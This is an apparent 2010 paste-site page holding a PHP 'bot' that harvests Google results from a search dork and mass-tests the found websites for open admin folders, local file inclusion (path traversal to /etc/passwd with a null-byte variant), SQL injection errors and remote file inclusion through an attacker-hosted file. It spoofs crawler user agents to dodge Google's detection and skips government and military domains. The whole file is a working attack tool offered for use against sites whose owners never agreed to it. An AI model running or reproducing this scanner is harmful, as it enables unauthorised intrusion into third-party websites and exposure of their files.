Paste: rfi scanner lfi sqli admin

Author:	-null-
Mode:	php
Date:	Thu, 20 May 2010 10:50:59

Plain Text |

Delete Paste

<?php
/* -null- bot v2 coded by -null-.... enjoy and greets to..sorry bout those who i forgot
   Dasteem | alphanix | d0ped | luit | triCk | cybern3tic | pimpinjg | led-zeppelin | khui | navirio | boxhead | marezzi | d3trimental | fx0 | Citrobacter
   h4cky0u.org | p0ison.org | gonullyourself.org
   Let this be first release under X2 crew...we are -null- and Citrobacter
``````````.`..``.``.-.``````````````````````````````````````````````
```````````-:.``````.::-`.``````````````````````````````````````````
`````..```:/.``...`.``.o:.``````````````````````````````````````````
`````.``.-s-..`````````o+```````````````````````````````````````````
`````````.o+```````````oo.``````````````````````````````````````````
``````.``./+:``..````..o+-````````````````.`````.``.````````````````
`````.`..`:++.````````.o/+````````````````.-/:.`.`.`````````````````
````````.`-+++.``......o/+.```````````````.s/-:/+:.`````````````````
```````````+/+:-:+++++oo++/:-..```````````./o/--o+.`````````````````
```````````++++++++/+o++/--/o:`.``````````./++/+/-..````````````````
`````````.-++//++++++++::-:+++-.`````.```./+/.....``````````````````
``````.``.o/---/:/++++//+/+++/+-``..``.`./o/..``````````````````````
```````.`./++//+/+++o+ooo//+///+..```.`:++/```.`````````````````````
``````````./+/////o++yo++//////o.````.:++/..`````````.--..``````````
``````````../++///+//o//++/ooo++.`.`.:++/```````````.+o+::.``.``````
````````````.:/+//+///+ssyys+/o-```-:o+:`.```````````:o++s+.`.``````
````````````...-//++++so+oo///+/-:/+++-`````.``.````.+o:::-..```````
```````````.````.-:::::::/++///++++o:...``.``...-:::+o:``..`````````
````````.``````.```````.-/o++//++ooo++++/:///+++///:-.`.````````````
.`.//:.````....---::::/+++::++osoo++++++oos----------..``...`.``````
.`/+-++////++++++++++//:-.``-so++++++++++oyooooooooooo+/--.`````````
`.-o..o+::-------...````.``.:o+++o++++oossssssssoosssosssoo/-.`.````
.`-+/++/`..````````````````./so++++osssssossssssooosossssssso/..````
.`...--.`````````````````.-++::+sssssossossssssssoossssosssssso/..`.
`````````.`````.--..````./o/.`..+ssosoosssssssssssosssysssssssss+-``
```````````.`.`:o+o:----++-`````.:sssssooosssssssysssssssyssssssso-.
```````````````.+/oo//+/:.```.``.-ssssssosssssssosssyysoysssssssoso-
```````````````.++o:``.`````````.-sosos::+oosssoososyssssssssssssss:
````````````````....``.``````````.oossy..`.--:++oosyssysosssssssoss-
```````````````````.```````````..`+ssos.``.`````.-osssyossssssooss/.
```````````````````````````````.``.ssss:`.``````.`+ssso:+oooooo+/:.`
``````````````````````````````````.-sso+.`````````+soos-`......``.`.
```````````````````````````````.```.ooss-`.``````.-ooss+..``````````
``````````````````````````````````..osss:````````.`-ooss:.``````````
```````````````````````````````````:ssos:.``````````-osss:``..``````
````````````````````````````.`.../+ssso:..```````````./sss...`.`````
``````````````````````````.``.`/sossoo.``.````````````./sso+:.``````
``````````````````````````.``.`ss:/+so..``````````````.os/sos/``````
```````````````````````````...`-+o:o/.````````````````:y:.:ss/.`````
``````````````````````````.``.```..`````.````````````.`-/-//-``.

*/
// modify these as needed, you must change variables marked with * otherwise the function that uses that variable wont work

// how many google pages to go through, remember minus 1 because l cbf fixing the increment bug, l fix it in final version
$how_many = 1;
// lfi scanner, leave this unless you have other ideas
$passwd = '../../../../../../../../../../etc/passwd';

// * this you must change, this is your rfi file, create a file to include from some host with the contents from lines 60 to 62, and set this to its url location
$my_rfi = "http://127.0.0.1/rfi.txt?";

/*

<?php
echo "Scanned by -null- scanner v2";
?>

*/








error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '9999M');
$scan_count = 0;
$success = 0;
$failrate = 0;



$query = stripslashes($_POST['dork']);
if ($query == '') {
echo "
<form action='' method= 'post' >
<center><b>Query</b><br>
<input type='text' size='20' name='dork'>

<select name='vuln_type'>
<option value='ADMIN'>Admin scanner</option>
<option value='SQLI'>SQLI scanner</option>
<option value='LFI'>LFI scanner</option>
<option value='RFI'>RFI scanner</option>
</select></form></TABLE></td></tr></center>
";
}
if ($query != '' ) {

$scan_type = $_POST['vuln_type'];





// useragents to bypass google captcha bullshit and stop google detecting the bot

$agents = array('Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)',
 'Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)',
 'YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users …; views …)', 
 'Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)', 
 'Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 
 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)');





$rounds = 10 * $how_many;
$started_rounds = 0;
$counted = 10;
while ($started_rounds <= $rounds) {
$counted++;
$rand = rand('0', '23');
$useragent = $agents[$rand];







$transf = curl_init();
curl_setopt($transf, CURLOPT_USERAGENT, $useragent); 
        curl_setopt($transf, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($transf, CURLOPT_URL, "http://www.google.com/search?q=$query&hl=en&start=$started_rounds&sa=N");
     $file = curl_exec($transf);
       curl_close($transf);


















preg_match_all ("/a[\s]+href[\s]?=[\s\"\']+". "http(.*?)[\"\']+.*?"."/", $file, $ok);
$count = count($ok[1]);
$started_rounds = $started_rounds + 10;

for ($counted = 0; $counted < $count ; $counted++) {

$url = "http" . $ok[1]["$counted"];
$url2 = eregi_replace("http://|https|www.", "", $url);
$total = strlen($url2);
$pos = strpos($url2, "/");
$sum = $total -$pos;
$domain = substr($url2, 0, -$sum);
// filter out the shit... This is your blacklist, be sure to seperate the url, and to eliminate subdomains add the main site and then .site as well
if (eregi("youtube.com|google.com|googleusercontent.com|facebook.com|photobucket.com|.mil|.gov|.edu|.au|.go", $domain))
{
$domain = '';
}
if ($domain != '' && $domain != ':') {


if ($scan_type == 'ADMIN') {

// admin finder
$scan_for = array('admin', 'adm');


$host = $domain;
foreach ($scan_for as $scan){
$scan_count++;
$headers= get_headers("http://$domain/$scan/");


if (eregi('200', $headers[0])) {
echo "<br>[+]$host/$scan";
$success++;

} else {
echo "<br>[-]$host/$scan";
$failrate++;
// do something here

}
}
} else {
if ($scan_type == 'LFI') {
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
$clean = explode('=', $url);
$test2 = "$clean[0]=$passwd";
$test3 = "$clean[0]=$passwd%00";
$exploit_1 = file_get_contents($test2);
if (eregi("root:x:0", $exploit_1)) {
echo "<br>[+]$test2";
$success++;
} else {
$exploit_2 = file_get_contents($test3);
if (eregi("root:x:0", $exploit_2)) {
echo "<br>[+]$test3";
$success++;
} else {
$failrate++;
echo "<br>[-]$test2";
echo "<br>[-]$test3";
}
}
}
} else {

if ($scan_type == 'SQLI') {

if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
$clean = str_replace("=", "='". '"', $url);

$exploit_1 = file_get_contents($clean);
if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags(html_entity_decode($exploit_1) ) , $useless)) {

echo "<br>[+]$clean";


$success++;
} else {
echo "<br>[-]$clean";
$failrate++;

}
}
} else {
if ($scan_type == 'RFI') {
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
$clean = explode('=', $url);
$test2 = "$clean[0]=$my_rfi";
$test3 = "$clean[0]=$my_rfi%00";
$exploit_1 = file_get_contents($test2);
if (eregi("Scanned by -null- scanner v2", $exploit_1)) {
echo "<br>[+]$test2";
$success++;
} else {
$exploit_2 = file_get_contents($test3);
if (eregi("Scanned by -null- scanner v2", $exploit_2)) {
echo "<br>[+]$test3";
$success++;
} else {
$failrate++;
echo "<br>[-]$test2";
echo "<br>[-]$test3";
}
}
}
}
}
}
}

}
}
} 

if ($success == '') {
$success = 0;
}
if ($failrate == '') {
$failrate = 0;
}
echo "
<br><br><br><br><br><b>Total scanned urls: <u>$scan_count</u></b>
<br>Successful scans <u>$success</u>
<br>Failed scans <u>$failrate</u>
<br>Search query <u>$query</u>";

}
echo $file;
?>

New Annotation

Summary:
Author:
Mode:	textPostgreSQLPowerCenter Parameter Fileactionscriptadaada95ans-forth94antantlrantlr4apacheconfapdlapplescriptaspaspect-jassembly-agcassembly-agsassembly-arm32assembly-m68kassembly-macro32assembly-mcs51assembly-parrotassembly-r2000assembly-x86avroawkbbatchbbjbcelbeanshellbibtexbinsource-agccc#c++cfscriptchillcilclipsclojurecmakecobolcoffeescriptcoldfusioncplex-lpcsscsvcvs-commitddartdjangodockerfiledotdoxygendrawj2ddsssleiffelembperlerlangfactorfhtmlforthfortranfortran90foxprofreemarkergcbasicgettextgherkingnuplotgogradlegroovygsphaskellhaxehexhl7v2hlslhtaccesshtmlhxmli4glicalendariconidlinforminiinno-setupinterlisiojamonjavajava module-infojavaccjavafxjavascriptjcljedit-actionsjflexjhtmljmkjsonjspkotlinlatexlexlilypondlispliterate-haskelllogslogtalklotosluam4macroschedulermailmakefilemaplemarkdownmavenmavscriptmetapostmlmodula3moinmqscmustache-templatemxmlmyghtymysqln3netrexxnqcnsis2objective-cobjectrexxoccamomnimarkopensipsoutlinepascalpatchperlphppikepl-sqlpl-sql9pl1plaintexplantumlpop11postscriptpovraypowerdynamopowershellprogressprologpropertiesprotobufpspptlpurepvwavepyrexpythonqdocrakefilercprdrebolredcoderelax-ng-compactrenderman-ribrestrfcrhtmlroffrpm-specrtfrubyrustrviews#s+sassbtscalaschemesdl/prsgmlshellscriptshtmlsipsippslateslaxsmalltalksmartysmi-mibsparqlsql-loadersqrsquidconfstatasvn-commitswiftswigtcltemplate-toolkittextexinfotldtransact-sqltsptwikityposcripturluscriptvalavbscriptvelocityverilogvhdlvisualbasicvrml2wellknowntextxmlxqxslyabyamlzpt
Body:

Done